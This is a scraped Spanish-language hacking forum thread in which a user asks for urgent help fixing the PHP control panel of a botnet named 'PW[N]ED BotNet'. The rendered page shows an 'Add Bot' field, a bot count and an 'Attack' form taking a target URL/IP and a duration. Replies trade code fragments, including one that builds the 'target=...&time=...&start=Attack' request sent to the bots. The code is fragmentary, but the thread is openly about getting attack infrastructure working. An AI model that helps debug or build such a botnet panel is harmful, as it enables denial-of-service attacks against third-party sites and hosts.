• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Help me! es urgente xD

Status
Not open for further replies.

[C]ond[O]

Leech
User
Joined
May 15, 2013
Messages
34
Reputation
0
Reaction score
4
Points
8
Credits
0
‎12 Years of Service‎
68%
index.php ForoMalware - PW[N]ED BotNet PW[N]ED BotNet - Powered by PW[N]ED

Add Bot
add.png



Raven URL:


Bots: '.mysqli_num_rows($num1).'


Attack
attack.png



Target URL/IP: Time:



 
Re: Help me! es urgente xD

EL problema es que debes usar la funcion isset como en este ejemplo:

Code:
>if (isset($_POST['target'])) {
$obj = $_POST['target'];
} else {
$obj = "";
}
 
Re: Help me! es urgente xD

lo puse asi

Code:
>
if (isset($_POST['target'])) { 
   $obj = $_POST['target']; 
   $tiempo=$_POST['time'];
   $bot=htmlentities($_POST['bot'], ENT_QUOTES);
} else { 
$obj = ""; 
}
y me salta error en estas lineas ahora

Code:
>    $exts=explode(".", $bot);
Code:
>       $encod="target=".$obj."&time=".$tiempo."&start=Attack%21";
jeje help me :B

 
Re: Help me! es urgente xD

Que error te muestra?

 
Status
Not open for further replies.
Back
Top